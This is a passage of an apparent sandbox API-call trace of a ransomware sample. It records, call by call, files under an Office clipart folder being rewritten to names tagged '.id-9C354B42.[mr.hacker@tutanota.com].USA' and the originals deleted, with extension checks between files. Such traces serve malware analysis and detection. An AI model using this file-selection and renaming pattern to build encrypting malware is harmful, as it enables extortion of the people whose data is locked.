Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.094] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf")) returned 1 [0269.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.094] lstrlenW (lpString=".doc") returned 4 [0269.094] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.094] lstrlenW (lpString=".docx") returned 5 [0269.094] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.094] lstrlenW (lpString=".pdf") returned 4 [0269.094] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.094] lstrlenW (lpString=".xls") returned 4 [0269.094] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.094] lstrlenW (lpString=".xlsx") returned 5 [0269.094] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.094] lstrlenW (lpString=".ppt") returned 4 [0269.094] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.094] lstrlenW (lpString=".zip") returned 4 [0269.094] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.095] lstrlenW (lpString=".rar") returned 4 [0269.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.095] lstrlenW (lpString=".bz2") returned 4 [0269.095] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.095] lstrlenW (lpString=".7z") returned 3 [0269.095] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.095] lstrlenW (lpString=".dbf") returned 4 [0269.095] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.095] lstrlenW (lpString=".1cd") returned 4 [0269.095] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.095] lstrlenW (lpString=".jpg") returned 4 [0269.095] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.095] lstrlenW (lpString=".doc") returned 4 [0269.095] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.095] lstrlenW (lpString=".docx") returned 5 [0269.095] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.095] lstrlenW (lpString=".pdf") returned 4 [0269.095] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.095] lstrlenW (lpString=".xls") returned 4 [0269.095] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.095] lstrlenW (lpString=".xlsx") returned 5 [0269.095] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.095] lstrlenW (lpString=".ppt") returned 4 [0269.095] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.096] lstrlenW (lpString=".zip") returned 4 [0269.096] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.096] lstrlenW (lpString=".rar") returned 4 [0269.096] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.096] lstrlenW (lpString=".bz2") returned 4 [0269.096] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.096] lstrlenW (lpString=".7z") returned 3 [0269.096] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.096] lstrlenW (lpString=".dbf") returned 4 [0269.096] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.096] lstrlenW (lpString=".1cd") returned 4 [0269.096] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0269.096] lstrlenW (lpString=".jpg") returned 4 [0269.096] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.096] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.096] lstrlenW (lpString="DD01039_.WMF") returned 12 [0269.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.097] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=14820) returned 1 [0269.097] CloseHandle (hObject=0x390) returned 1 [0269.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf")) returned 0x20 [0269.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.097] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.097] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0269.097] GetLastError () returned 0x0 [0269.098] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x39e4, lpOverlapped=0x0) returned 1 [0269.102] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x39f0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x39f0, lpOverlapped=0x0) returned 1 [0269.103] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.103] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.103] SetEndOfFile (hFile=0x3a0) returned 1 [0269.103] CloseHandle (hObject=0x3a0) returned 1 [0269.103] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.103] SetEndOfFile (hFile=0x390) returned 1 [0269.106] CloseHandle (hObject=0x390) returned 1 [0269.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.106] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf")) returned 1 [0269.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.106] lstrlenW (lpString=".doc") returned 4 [0269.106] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.106] lstrlenW (lpString=".docx") returned 5 [0269.106] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.106] lstrlenW (lpString=".pdf") returned 4 [0269.106] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.107] lstrlenW (lpString=".xls") returned 4 [0269.107] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.107] lstrlenW (lpString=".xlsx") returned 5 [0269.107] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.107] lstrlenW (lpString=".ppt") returned 4 [0269.107] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.107] lstrlenW (lpString=".zip") returned 4 [0269.107] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.107] lstrlenW (lpString=".rar") returned 4 [0269.107] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.107] lstrlenW (lpString=".bz2") returned 4 [0269.107] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.107] lstrlenW (lpString=".7z") returned 3 [0269.107] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.107] lstrlenW (lpString=".dbf") returned 4 [0269.107] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.107] lstrlenW (lpString=".1cd") returned 4 [0269.107] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.359] lstrlenW (lpString=".jpg") returned 4 [0269.359] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.360] lstrlenW (lpString=".doc") returned 4 [0269.360] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString=".docx") returned 5 [0269.360] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.360] lstrlenW (lpString=".pdf") returned 4 [0269.360] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString=".xls") returned 4 [0269.360] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.360] lstrlenW (lpString=".xlsx") returned 5 [0269.360] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.360] lstrlenW (lpString=".ppt") returned 4 [0269.360] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.360] lstrlenW (lpString=".zip") returned 4 [0269.360] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.360] lstrlenW (lpString=".rar") returned 4 [0269.360] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString=".bz2") returned 4 [0269.360] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString=".7z") returned 3 [0269.360] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.360] lstrlenW (lpString=".dbf") returned 4 [0269.360] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.360] lstrlenW (lpString=".1cd") returned 4 [0269.360] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0269.361] lstrlenW (lpString=".jpg") returned 4 [0269.361] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.361] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.361] lstrlenW (lpString="DD01160_.WMF") returned 12 [0269.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0269.369] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2228) returned 1 [0269.369] CloseHandle (hObject=0x398) returned 1 [0269.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf")) returned 0x20 [0269.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.412] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.412] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.413] GetLastError () returned 0x0 [0269.413] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x8b4, lpOverlapped=0x0) returned 1 [0269.414] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0269.415] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.415] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.415] SetEndOfFile (hFile=0x3b0) returned 1 [0269.415] CloseHandle (hObject=0x3b0) returned 1 [0269.415] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.415] SetEndOfFile (hFile=0x3ac) returned 1 [0269.417] CloseHandle (hObject=0x3ac) returned 1 [0269.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.417] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf")) returned 1 [0269.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.418] lstrlenW (lpString=".doc") returned 4 [0269.418] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.418] lstrlenW (lpString=".docx") returned 5 [0269.418] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.418] lstrlenW (lpString=".pdf") returned 4 [0269.418] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.418] lstrlenW (lpString=".xls") returned 4 [0269.418] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.418] lstrlenW (lpString=".xlsx") returned 5 [0269.418] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.418] lstrlenW (lpString=".ppt") returned 4 [0269.418] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.418] lstrlenW (lpString=".zip") returned 4 [0269.418] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.418] lstrlenW (lpString=".rar") returned 4 [0269.418] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.418] lstrlenW (lpString=".bz2") returned 4 [0269.418] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.418] lstrlenW (lpString=".7z") returned 3 [0269.418] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.418] lstrlenW (lpString=".dbf") returned 4 [0269.418] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.419] lstrlenW (lpString=".1cd") returned 4 [0269.419] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.419] lstrlenW (lpString=".jpg") returned 4 [0269.419] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.419] lstrlenW (lpString=".doc") returned 4 [0269.419] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.419] lstrlenW (lpString=".docx") returned 5 [0269.419] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.419] lstrlenW (lpString=".pdf") returned 4 [0269.419] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.419] lstrlenW (lpString=".xls") returned 4 [0269.419] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.419] lstrlenW (lpString=".xlsx") returned 5 [0269.419] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.419] lstrlenW (lpString=".ppt") returned 4 [0269.419] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.419] lstrlenW (lpString=".zip") returned 4 [0269.419] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.419] lstrlenW (lpString=".rar") returned 4 [0269.419] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.419] lstrlenW (lpString=".bz2") returned 4 [0269.419] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.419] lstrlenW (lpString=".7z") returned 3 [0269.419] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.420] lstrlenW (lpString=".dbf") returned 4 [0269.420] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.420] lstrlenW (lpString=".1cd") returned 4 [0269.420] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0269.420] lstrlenW (lpString=".jpg") returned 4 [0269.420] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.420] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.420] lstrlenW (lpString="DD01167_.WMF") returned 12 [0269.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.420] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2080) returned 1 [0269.420] CloseHandle (hObject=0x3ac) returned 1 [0269.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf")) returned 0x20 [0269.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.421] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.421] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.421] GetLastError () returned 0x0 [0269.421] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x820, lpOverlapped=0x0) returned 1 [0269.423] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x830, lpOverlapped=0x0) returned 1 [0269.424] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.424] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.424] SetEndOfFile (hFile=0x3b0) returned 1 [0269.424] CloseHandle (hObject=0x3b0) returned 1 [0269.424] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.424] SetEndOfFile (hFile=0x3ac) returned 1 [0269.427] CloseHandle (hObject=0x3ac) returned 1 [0269.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.428] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf")) returned 1 [0269.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.428] lstrlenW 